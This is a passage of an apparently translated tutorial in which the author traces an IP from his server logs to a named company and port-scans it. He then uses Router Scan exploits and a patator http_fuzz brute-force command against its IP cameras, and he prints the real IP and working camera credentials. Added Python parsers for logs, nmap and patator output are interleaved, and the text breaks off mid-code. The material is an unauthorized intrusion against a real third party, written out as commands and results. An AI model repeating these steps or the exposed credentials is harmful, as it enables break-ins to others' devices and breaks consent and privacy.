How to search and brute force services on non-standard ports
If you are wondering where I got the IP address that is used in the examples of this article: I took it from the access logs of the web server.
Someone, apparently, tried to brute-force the site:
HTTP Requests for DoS attack against the website:
193.232.100.234 - - [16/Mar/2019:01:52:24 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/init?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&isTopLevel=true&nocache=11cc8 HTTP/1.0" 403 243 "https://kali.tools/all/?tool=5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools
193.232.100.234 - - [16/Mar/2019:01:53:25 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/websocket?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&nocache=1552690388964 HTTP/1.0" 403 248 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools
193.232.100.234 - - [16/Mar/2019:01:53:25 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/init?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&isTopLevel=true&nocache=1a774 HTTP/1.0" 403 243 "https://kali.tools/all/?tool=5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools
193.232.100.234 - - [16/Mar/2019:01:53:26 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/websocket?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&nocache=1552690389978 HTTP/1.0" 403 248 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools
193.232.100.234 - - [16/Mar/2019:01:53:26 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/init?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&isTopLevel=true&nocache=1f50e HTTP/1.0" 403 243 "https://kali.tools/all/?tool=5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools
193.232.100.234 - - [16/Mar/2019:01:54:27 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/websocket?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&nocache=1552690450965 HTTP/1.0" 403 248 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools
193.232.100.234 - - [16/Mar/2019:01:54:27 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/init?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&isTopLevel=true&nocache=1fcfa HTTP/1.0" 403 243 "https://kali.tools/all/?tool=5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools
193.232.100.234 - - [16/Mar/2019:01:54:28 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/websocket?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&nocache=1552690451964 HTTP/1.0" 403 248 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools
193.232.100.234 - - [16/Mar/2019:01:54:28 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/init?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&isTopLevel=true&nocache=1fc40 HTTP/1.0" 403 243 "https://kali.tools/all/?tool=5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools
193.232.100.234 - - [16/Mar/2019:01:55:29 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/websocket?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&nocache=1552690512973 HTTP/1.0" 403 248 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools
I write “apparently” because I am not completely sure: the hosting equipment itself does not let through more than a few requests per second, and this IP was blocked long ago by an automatic script for too many requests to the site. That is, its incoming requests for at least the last couple of weeks (the period for which access logs are kept) arrive and receive 403 errors in response, so they do not have any significant influence on the server load. That is why I noticed this activity only a few weeks later.
Regardless of whether a program went mad or a person went mad, we have the IP address 193.232.100.234 and the moral right to a small investigation. Just a little one. Really just a little. We will not even touch anything. Just see who it is, that’s all…
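The pattern above (one client, the same two paths, a 403 every time, for weeks) is exactly the kind of thing a blocking script should surface rather than silently absorb. The following is an added example, not code from the article: a small parser for Apache combined-format log lines that counts denied responses per client and reports clients whose denied count crosses a threshold, together with the distinct paths they hit and the time span. The sample log lines are constructed (documentation IPs 203.0.113.5 and 198.51.100.7, example.com as the site) and mirror the shape of the real entries.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Apache "combined" format, as in the excerpt above: client IP, identity, user,
# [timestamp], "request line", status, bytes, "referer", "user agent".
# Anything after the user agent (e.g. a virtual host name) is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample log (not the real log from the article): one client
# repeatedly requesting two paths and receiving 403, plus one ordinary visitor.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Mar/2019:01:52:24 +0300] "GET /D46D2B0F/init?url=https%3A%2F%2Fexample.com%2F&nocache=11cc8 HTTP/1.0" 403 243 "https://example.com/" "Mozilla/5.0 (constructed)"
203.0.113.5 - - [16/Mar/2019:01:53:25 +0300] "GET /D46D2B0F/websocket?url=https%3A%2F%2Fexample.com%2F&nocache=1552690388964 HTTP/1.0" 403 248 "-" "Mozilla/5.0 (constructed)"
203.0.113.5 - - [16/Mar/2019:01:53:25 +0300] "GET /D46D2B0F/init?url=https%3A%2F%2Fexample.com%2F&nocache=1a774 HTTP/1.0" 403 243 "https://example.com/" "Mozilla/5.0 (constructed)"
203.0.113.5 - - [16/Mar/2019:01:53:26 +0300] "GET /D46D2B0F/websocket?url=https%3A%2F%2Fexample.com%2F&nocache=1552690389978 HTTP/1.0" 403 248 "-" "Mozilla/5.0 (constructed)"
203.0.113.5 - - [16/Mar/2019:01:54:27 +0300] "GET /D46D2B0F/init?url=https%3A%2F%2Fexample.com%2F&nocache=1f50e HTTP/1.0" 403 243 "https://example.com/" "Mozilla/5.0 (constructed)"
203.0.113.5 - - [16/Mar/2019:01:54:27 +0300] "GET /D46D2B0F/websocket?url=https%3A%2F%2Fexample.com%2F&nocache=1552690450965 HTTP/1.0" 403 248 "-" "Mozilla/5.0 (constructed)"
198.51.100.7 - - [16/Mar/2019:01:54:30 +0300] "GET /all/?tool=5 HTTP/1.1" 200 15320 "-" "Mozilla/5.0 (constructed)"
198.51.100.7 - - [16/Mar/2019:01:54:31 +0300] "GET /style.css HTTP/1.1" 200 4120 "https://example.com/all/?tool=5" "Mozilla/5.0 (constructed)"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    parts = rec["req"].split()
    # Path without the query string, so "init?nocache=11cc8" and "init?nocache=1a774" group together
    rec["path"] = parts[1].split("?")[0] if len(parts) >= 2 else ""
    return rec


def denied_clients(lines, min_denied=5):
    """Return {ip: {"denied", "total", "paths", "span_s"}} for every client
    that collected at least min_denied 4xx responses in the given lines."""
    totals, denied = Counter(), Counter()
    paths = defaultdict(set)
    first, last = {}, {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # skip lines that do not match the format
        ip = rec["ip"]
        totals[ip] += 1
        paths[ip].add(rec["path"])
        first.setdefault(ip, rec["ts"])
        last[ip] = rec["ts"]
        if 400 <= rec["status"] < 500:
            denied[ip] += 1
    return {
        ip: {
            "denied": denied[ip],
            "total": totals[ip],
            "paths": sorted(paths[ip]),
            "span_s": int((last[ip] - first[ip]).total_seconds()),
        }
        for ip in totals
        if denied[ip] >= min_denied
    }


if __name__ == "__main__":
    for ip, info in denied_clients(SAMPLE_LOG.splitlines()).items():
        print(ip, info)
```

Run over a real access log (`denied_clients(open("access.log"))`) this reports the repeat offenders the blocking script has been quietly answering with 403; the ratio of denied to total and the small number of distinct paths separate a stuck bot from a legitimate crawler.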
Let's try to get hostname by IP:
dig -x 193.232.100.234
And:
nslookup 193.232.100.234
Since there is no PTR record for this host, we received no data.
Sometimes results can be obtained by searching for sites hosted on the same IP, as well as from Securitytrails.
The first service gave us a hostname:
- lk.repropark.ru
Check that the host lk.repropark.ru is really bound to the IP address under investigation:
dig +short lk.repropark.ru
193.232.100.234
Securitytrails also led to lk.repropark.ru, and this host in turn revealed the existence of the mailsrvnew.repropark.ru and meet.repropark.ru hosts.
So, there are the following hosts:
- lk.repropark.ru (193.232.100.234)
- mailsrvnew.repropark.ru (IP not resolved at this time)
- meet.repropark.ru (193.232.100.237)
- repropark.ru (195.208.0.16)
Since this is the site of a factory (of sorts), it turns out that the DoS attack was carried out either by:
a) someone else who has already hacked the servers of this organization and uses them for their own purposes
b) the system administrator of this company who went mad
How to define services on non-standard ports
Perform a full port scan along with collection of service banners:
sudo nmap -p- -sV --script=banner 193.232.100.234
We get the following result:
Nmap scan report for 193.232.100.234
Host is up (0.092s latency).
Not shown: 65135 filtered ports, 354 closed ports
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           vsftpd 3.0.3
|_banner: 220 (vsFTPd 3.0.3)
22/tcp    open  ssh           OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
|_banner: SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u4
25/tcp    open  smtp?
| fingerprint-strings:
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, LDAPSearchReq, RTSPRequest:
|     452 syntax error (connecting)
|     syntax error (connecting)
|   Hello, Help, Kerberos, LPDString, SSLSessionReq, TLSSessionReq:
|     452 syntax error (connecting)
|   SIPOptions:
|     452 syntax error (connecting)
|     syntax error (connecting)
|     syntax error (connecting)
|     syntax error (connecting)
|_    many errors
80/tcp    open  http          Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
211/tcp   open  ftp           vsftpd 3.0.2
|_banner: 220 (vsFTPd 3.0.2)
212/tcp   open  ftp           Microsoft ftpd
|_banner: 220 Microsoft FTP Service
443/tcp   open  ssl/http      Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
1723/tcp  open  pptp          MikroTik (Firmware: 1)
5010/tcp  open  ssh           OpenSSH 6.0p1 Debian 4+deb7u3 (protocol 2.0)
|_banner: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u3
5013/tcp  open  ssl/fmpro-v6?
5222/tcp  open  jabber        Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
|   STARTTLS Failed
|   info:
|     compression_methods:
|
|     features:
|
|     stream_id: 6oytos41yv
|     unknown:
|
|     errors:
|       invalid-namespace
|       (timeout)
|     xmpp:
|       server name: chatsrv
|       version: 1.0
|     auth_mechanisms:
|
|_    capabilities:
7211/tcp  open  ftp           vsftpd 3.0.2
|_banner: 220 (vsFTPd 3.0.2)
7443/tcp  open  ssl/http      Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
8000/tcp  open  ssh           OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
|_banner: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3
8880/tcp  open  http          Apache httpd 2.2.25 ((Win32))
|_http-server-header: Apache/2.2.25 (Win32)
9090/tcp  open  http          Jetty
9780/tcp  open  unknown
9786/tcp  open  http          Devline Line surveillance system httpd
|_http-server-header: Devline Linia Server
9977/tcp  open  http          Boa httpd
9978/tcp  open  http          Boa httpd
9979/tcp  open  http          Boa httpd
9980/tcp  open  http          Boa httpd
9981/tcp  open  http          Boa httpd
9982/tcp  open  http          Boa httpd
9983/tcp  open  http          Boa httpd
9984/tcp  open  http          Boa httpd
9985/tcp  open  http          Boa httpd
9986/tcp  open  http          Boa HTTPd 0.94.13
|_http-server-header: Boa/0.94.13
9987/tcp  open  http          Boa HTTPd 0.94.13
|_http-server-header: Boa/0.94.13
9988/tcp  open  http          Boa HTTPd 0.94.13
|_http-server-header: Boa/0.94.13
9989/tcp  open  http          Boa HTTPd 0.94.13
|_http-server-header: Boa/0.94.13
9990/tcp  open  http          Boa HTTPd 0.94.13
|_http-server-header: Boa/0.94.13
9991/tcp  open  http          Boa HTTPd 0.94.13
|_http-server-header: Boa/0.94.13
9992/tcp  open  http          Boa HTTPd 0.94.13
|_http-server-header: Boa/0.94.13
9993/tcp  open  http          lighttpd
|_http-server-header: dcs-lig-httpd
9994/tcp  open  http          lighttpd
|_http-server-header: dcs-lig-httpd
9995/tcp  open  http          lighttpd
|_http-server-header: dcs-lig-httpd
9996/tcp  open  http          Boa HTTPd 0.94.13
|_http-server-header: Boa/0.94.13
9997/tcp  open  http          Boa HTTPd 0.94.13
|_http-server-header: Boa/0.94.13
9998/tcp  open  http          lighttpd (D-Link DCS IP camera)
|_http-server-header: dcs-lig-httpd
17789/tcp open  ssh           OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
|_banner: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u4
19777/tcp open  ssl/unknown
19781/tcp open  ssl/unknown
19782/tcp open  ssl/unknown
19887/tcp open  ssl/unknown
19889/tcp open  ssl/unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.70%I=7%D=3/17%Time=5C8E6552%P=x86_64-unknown-linux-gnu%r
SF:(Hello,1F,"452\x20syntax\x20error\x20\(connecting\)\r\n")%r(Help,1F,"45
SF:2\x20syntax\x20error\x20\(connecting\)\r\n")%r(GenericLines,3E,"452\x20
SF:syntax\x20error\x20\(connecting\)\r\n452\x20syntax\x20error\x20\(connec
SF:ting\)\r\n")%r(GetRequest,3E,"452\x20syntax\x20error\x20\(connecting\)\
SF:r\n452\x20syntax\x20error\x20\(connecting\)\r\n")%r(HTTPOptions,3E,"452
SF:\x20syntax\x20error\x20\(connecting\)\r\n452\x20syntax\x20error\x20\(co
SF:nnecting\)\r\n")%r(RTSPRequest,3E,"452\x20syntax\x20error\x20\(connecti
SF:ng\)\r\n452\x20syntax\x20error\x20\(connecting\)\r\n")%r(SSLSessionReq,
SF:1F,"452\x20syntax\x20error\x20\(connecting\)\r\n")%r(TLSSessionReq,1F,"
SF:452\x20syntax\x20error\x20\(connecting\)\r\n")%r(Kerberos,1F,"452\x20sy
SF:ntax\x20error\x20\(connecting\)\r\n")%r(FourOhFourRequest,3E,"452\x20sy
SF:ntax\x20error\x20\(connecting\)\r\n452\x20syntax\x20error\x20\(connecti
SF:ng\)\r\n")%r(LPDString,1F,"452\x20syntax\x20error\x20\(connecting\)\r\n
SF:")%r(LDAPSearchReq,3E,"452\x20syntax\x20error\x20\(connecting\)\r\n452\
SF:x20syntax\x20error\x20\(connecting\)\r\n")%r(SIPOptions,91,"452\x20synt
SF:ax\x20error\x20\(connecting\)\r\n452\x20syntax\x20error\x20\(connecting
SF:\)\r\n452\x20syntax\x20error\x20\(connecting\)\r\n452\x20syntax\x20erro
SF:r\x20\(connecting\)\r\n421\x20too\x20many\x20errors\r\n");
Service Info: Host: MikroTik; OSs: Unix, Linux, Windows; Devices: security-misc, webcam; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1000.83 seconds
Not a host but a Christmas tree! There are:
- 2 or 3 web servers (ports 80, 443 (HTTPS), 8880 and 7443 (also HTTPS))
- 4 SSH servers (ports 22, 5010, 8000 and 17789)
- 4 FTP servers (ports 21, 211, 212, 7211)
- Openfire, Version: 4.0.3 on port 9090
- HTTP server on port 9780 that did not accept any connection attempts
- an HTTP server on port 9786 which offers to download Flash Player; judging by the file http://193.232.100.234:9786/lang.json (found by analysing the page source), it belongs to the video surveillance system of ru.devline.tv (Devline Linia Server (Devline))
- Many Boa and lighttpd HTTP servers on ports 9977, 9978, 9979, 9980, 9981, 9982, 9983, 9984, 9985, 9986, 9987, 9988, 9989, 9990, 9991, 9992, 9993, 9994, 9995, 9996, 9997 and 9998
I googled it: Boa is a simple HTTP server for embedded hardware such as webcams.
For port 9998 it is written that this is a D-Link DCS IP camera.
There are also some quite incomprehensible ports.
Apparently, this is a router, or a computer, on which port forwarding to other devices located on the local network is configured.
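The summary above (how many web, SSH and FTP servers, which of them sit on unusual ports, and the tell-tale fact that four SSH servers report four different OpenSSH builds, which no single host would do) can be pulled out of the nmap output mechanically. The following is an added example, not code from the article or from nmap: a parser for nmap's normal output format that builds a service inventory, groups open ports by service family, lists services on ports other than their usual one, and collects the distinct version strings per family. The excerpt it parses is a subset of the scan above, in the column layout nmap prints; the table of "usual" ports is an assumption of this example and can be extended.

```python
import re
from collections import defaultdict

# One port line of nmap's normal (-oN / terminal) output, e.g.
#   "5010/tcp  open  ssh  OpenSSH 6.0p1 Debian 4+deb7u3 (protocol 2.0)"
PORT_RE = re.compile(
    r'^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)'
    r'(?:\s+(?P<version>.*))?$'
)

# Ports on which nmap's service names are normally expected
# (assumption for this example; extend as needed).
STANDARD_PORTS = {
    "ftp": {21}, "ssh": {22}, "smtp": {25}, "http": {80, 8080},
    "ssl/http": {443, 8443}, "pptp": {1723}, "jabber": {5222},
}

# Subset of the scan above, in nmap's own output format.
SCAN_EXCERPT = """\
PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          vsftpd 3.0.3
|_banner: 220 (vsFTPd 3.0.3)
22/tcp    open  ssh          OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
|_banner: SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u4
25/tcp    open  smtp?
80/tcp    open  http         Apache httpd 2.4.25 ((Debian))
211/tcp   open  ftp          vsftpd 3.0.2
|_banner: 220 (vsFTPd 3.0.2)
443/tcp   open  ssl/http     Apache httpd 2.4.10 ((Debian))
5010/tcp  open  ssh          OpenSSH 6.0p1 Debian 4+deb7u3 (protocol 2.0)
|_banner: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u3
8000/tcp  open  ssh          OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
9977/tcp  open  http         Boa httpd
9998/tcp  open  http         lighttpd (D-Link DCS IP camera)
|_http-server-header: dcs-lig-httpd
17789/tcp open  ssh          OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
19777/tcp open  ssl/unknown
"""


def parse_nmap(text):
    """Return a list of {port, proto, state, service, version, banner} dicts."""
    services, current = [], None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {
                "port": int(m["port"]), "proto": m["proto"], "state": m["state"],
                "service": m["service"], "version": (m["version"] or "").strip(),
                "banner": None,
            }
            services.append(current)
        elif current is not None and line.startswith("|_banner:"):
            # the banner script line belongs to the port line just above it
            current["banner"] = line[len("|_banner:"):].strip()
    return services


def service_families(services):
    """Group open ports by service family; plain and TLS-wrapped HTTP both count as 'web'."""
    fam = defaultdict(list)
    for s in services:
        if s["state"] != "open":
            continue
        name = s["service"].rstrip("?")  # nmap marks guessed services with a trailing '?'
        fam["web" if name.endswith("http") else name].append(s["port"])
    return dict(fam)


def off_standard_ports(services):
    """Open services running on a port other than the one usually associated with them."""
    out = []
    for s in services:
        name = s["service"].rstrip("?")
        if s["state"] == "open" and name in STANDARD_PORTS and s["port"] not in STANDARD_PORTS[name]:
            out.append((s["port"], name))
    return out


def distinct_versions(services, family):
    """Distinct version strings seen for one service family on this address.
    Several different versions of the same daemon behind one IP point to
    port forwarding to several backend machines."""
    return sorted({s["version"] for s in services
                   if s["state"] == "open" and s["service"].rstrip("?") == family and s["version"]})


if __name__ == "__main__":
    svc = parse_nmap(SCAN_EXCERPT)
    print(service_families(svc))
    print(off_standard_ports(svc))
    print(distinct_versions(svc, "ssh"))
```

Feeding it the full scan (`parse_nmap(open("scan.txt").read())`) gives the same picture the article draws by hand, and on your own perimeter the `off_standard_ports` list is the set of forwardings worth reviewing: each one is a device on the LAN that is reachable from the Internet.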
How to use Router Scan by Stas’M on non-standard ports
The equipment on ports 9977, 9978, 9979, 9980, 9981, 9982, 9983, 9984, 9985, 9986, 9987, 9988, 9989, 9990, 9991, 9992, 9993, 9994, 9995, 9996, 9997 and 9998 is some sort of appliance, such as routers or IP cameras.
To check them, you can use RouterSploit or Router Scan by Stas’M.
By default, Router Scan scans three popular web ports: 80, 8080 and 1080. In our case all the ports are different, so I need to change the port settings. This can be done in the GUI or (which is faster if there are many ports) in the ports.txt file, which lies in the root folder of Router Scan: enter the required ports there, one port per line.
Run the scan:
For three devices the exploit works and we know their username and password: admin:njhufib
I looked – this is really an IP camera.
The password njhufib is not in the Router Scan dictionary, so even if other devices, for which there was no working exploit, have the same password, Router Scan cannot verify this.
How to brute-force services on non-standard ports
To check whether the found credentials also fit devices on other ports, we will use a wonderful brute-force program, patator.
In the options we will need to specify the authentication type, so first we need to find it out. This can be done with a command like:
curl -v HOST:PORT
In its output you need to look at the headers.
For example:
curl -v 193.232.100.234:9977
Displays:
*   Trying 193.232.100.234...
* TCP_NODELAY set
* Connected to 193.232.100.234 (193.232.100.234) port 9977 (#0)
> GET / HTTP/1.1
> Host: 193.232.100.234:9977
> User-Agent: curl/7.64.0
> Accept: */*
>
* HTTP 1.0, assume close after body
< HTTP/1.0 401 Unauthorized
< Date: Tue, 19 Mar 2019 04:34:45 GMT
< Connection: close
< WWW-Authenticate: Basic realm="DCS-2103"
< Content-Length: 0
< Content-Type: text/html; charset=ISO-8859-1
<
* Closing connection 0
Look at the line containing WWW-Authenticate: Basic: so, Basic authentication is used.
In case of a failed login, an error code of 401 (Unauthorized) is returned.
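Reading the WWW-Authenticate header by eye works for one host; for a whole list of ports it is easier to parse it. The following is an added example, not code from the article: it takes either a raw HTTP response or the output of `curl -v` (where response lines are prefixed with `< `), extracts the status code and every WWW-Authenticate challenge, and splits each challenge into its scheme (Basic, Digest, NTLM, Negotiate) and parameters such as the realm. The curl session is the one shown above; the Digest, NTLM and "no authentication at all" responses are constructed for the example. The last case matters on the defensive side: a 200 with no challenge on a camera port means the device is open to anyone, which is what the article later finds on port 9786.

```python
import re

# Scheme token followed by optional comma-separated auth-params (RFC 7235 syntax).
CHALLENGE_RE = re.compile(r'^(?P<scheme>[A-Za-z][\w-]*)\s*(?P<params>.*)$')
PARAM_RE = re.compile(r'(?P<k>[\w-]+)\s*=\s*(?:"(?P<q>[^"]*)"|(?P<u>[^,\s]+))')

# The curl -v session from the article; lines prefixed '< ' are the response.
CURL_VERBOSE = """\
*   Trying 193.232.100.234...
* Connected to 193.232.100.234 (193.232.100.234) port 9977 (#0)
> GET / HTTP/1.1
> Host: 193.232.100.234:9977
> User-Agent: curl/7.64.0
> Accept: */*
>
< HTTP/1.0 401 Unauthorized
< Date: Tue, 19 Mar 2019 04:34:45 GMT
< Connection: close
< WWW-Authenticate: Basic realm="DCS-2103"
< Content-Length: 0
< Content-Type: text/html; charset=ISO-8859-1
<
* Closing connection 0
"""

# Constructed raw responses (not from the article) covering the other cases.
RAW_DIGEST = ("HTTP/1.1 401 Unauthorized\r\n"
              "WWW-Authenticate: Digest realm=\"cam\", qop=\"auth\", nonce=\"abc123\", algorithm=MD5\r\n"
              "Content-Length: 0\r\n\r\n")
RAW_NTLM = ("HTTP/1.1 401 Unauthorized\r\n"
            "WWW-Authenticate: Negotiate\r\n"
            "WWW-Authenticate: NTLM\r\n\r\n")
RAW_OPEN = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>no login at all</html>"


def response_lines(text):
    """Accept a raw HTTP response or curl -v output (response lines start with '< ')."""
    lines = text.splitlines()
    if any(l.startswith("< ") for l in lines):
        return [l[2:] for l in lines if l.startswith("< ")]
    return lines


def parse_challenge(value):
    """Split 'Basic realm="x"' into {"scheme": "Basic", "params": {"realm": "x"}}."""
    m = CHALLENGE_RE.match(value.strip())
    if m is None:
        return None
    params = {}
    for pm in PARAM_RE.finditer(m["params"]):
        params[pm["k"].lower()] = pm["q"] if pm["q"] is not None else pm["u"]
    return {"scheme": m["scheme"], "params": params}


def detect_auth(text):
    """Return {"status": int|None, "challenges": [...]} describing what the server demands."""
    status, challenges = None, []
    for line in response_lines(text):
        if line.startswith("HTTP/"):
            parts = line.split()
            status = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else None
            continue
        if not line.strip():
            break  # blank line ends the header block; a body may follow
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "www-authenticate":
            ch = parse_challenge(value)
            if ch:
                challenges.append(ch)
    return {"status": status, "challenges": challenges}


def summarize(result):
    """One-line verdict: which scheme(s) and realm(s), or that nothing is demanded."""
    if result["status"] != 401 or not result["challenges"]:
        return "no HTTP authentication challenge (status %s)" % result["status"]
    return ", ".join('%s realm=%s' % (c["scheme"].lower(), c["params"].get("realm", "-"))
                     for c in result["challenges"])


if __name__ == "__main__":
    for sample in (CURL_VERBOSE, RAW_DIGEST, RAW_NTLM, RAW_OPEN):
        print(summarize(detect_auth(sample)))
```

Saving each port's `curl -v` output to a file and running `detect_auth` over them gives the auth_type to pass to patator per port, and immediately separates the devices that present no challenge at all.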
We compose the command:
patator http_fuzz url=http://193.232.100.234:FILE0 0=ports.txt auth_type=basic user_pass=admin:njhufib -x ignore:code=401 -x ignore,retry:code=500
Where:
- http_fuzz – use the http_fuzz module, which brute-forces Basic, Digest and NTLM authentication, brute-forces web form logins and searches for hidden files and folders. It can probably be used for other things as well: patator is a super flexible program.
- url=http://193.232.100.234:FILE0 – the URL is the string http://193.232.100.234: followed (after the colon, as you can see) by the values from file 0 (FILE0). In case you forgot, a port is written after a colon, so the same IP address is taken as the host, but with different ports
- 0=ports.txt – file number 0 is named ports.txt. As said, the values from this file are substituted as ports. I simply borrowed ports.txt from Router Scan.
- auth_type=basic – Basic is set as the authentication method
- user_pass=admin:njhufib – sets the username and password; I use the static pair admin:njhufib
- -x ignore:code=401 – ignore (do not display) attempts for which the response code was 401 (Unauthorized)
- -x ignore,retry:code=500 – ignore (do not display) attempts for which the response code was 500 (a problem on the server side), but retry the same login and password.
We get:
07:35:23 patator INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-03-19 07:35 MSK
07:35:23 patator INFO -
07:35:23 patator INFO - code size:clen time | candidate | num | mesg
07:35:23 patator INFO - -----------------------------------------------------------------------------
07:35:23 patator INFO - 200 2855:2727 0.242 | 9983 | 7 | HTTP/1.1 200 OK
07:35:23 patator INFO - 200 2855:2727 0.239 | 9984 | 8 | HTTP/1.1 200 OK
07:35:24 patator INFO - 200 2785:2657 0.250 | 9990 | 14 | HTTP/1.1 200 OK
07:35:24 patator INFO - 200 2785:2657 0.227 | 9991 | 15 | HTTP/1.1 200 OK
07:35:24 patator INFO - 200 2785:2657 0.227 | 9992 | 16 | HTTP/1.1 200 OK
07:35:24 patator INFO - 200 2593:2378 0.233 | 9993 | 17 | HTTP/1.1 200 OK
07:35:24 patator INFO - 200 2591:2378 0.232 | 9994 | 18 | HTTP/1.1 200 OK
07:35:24 patator INFO - 200 2593:2378 0.232 | 9995 | 19 | HTTP/1.1 200 OK
07:35:24 patator INFO - 200 2785:2657 0.235 | 9997 | 21 | HTTP/1.1 200 OK
07:35:24 patator INFO - 200 2593:2378 0.239 | 9998 | 22 | HTTP/1.1 200 OK
07:35:25 patator INFO - Hits/Done/Skip/Fail/Size: 10/22/0/0/22, Avg: 10 r/s, Time: 0h 0m 2s
Look at the candidate column: this credential pair also worked on another ten hosts, on the following ports:
- 9983
- 9984
- 9990
- 9991
- 9992
- 9993
- 9994
- 9995
- 9997
- 9998
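What this output tells a defender is not just "ten hits" but which devices share one password: the size:clen column is a response signature, and devices returning byte-identical start pages are almost certainly the same model on the same firmware. The following is an added example, not code from the article or from patator: a parser for patator's http_fuzz result rows and its final summary line, with a helper that clusters the successful candidates by response signature. It runs over the output shown above.

```python
import re
from collections import defaultdict

# A result row of patator's http_fuzz output, e.g.
#   "07:35:23 patator INFO - 200 2855:2727 0.242 | 9983 | 7 | HTTP/1.1 200 OK"
ROW_RE = re.compile(
    r'^\S+\s+patator\s+INFO\s+-\s+(?P<code>\d{3})\s+(?P<size>\d+):(?P<clen>\d+)\s+'
    r'(?P<time>[\d.]+)\s*\|\s*(?P<candidate>[^|]*?)\s*\|\s*(?P<num>\d+)\s*\|\s*(?P<mesg>.*)$'
)
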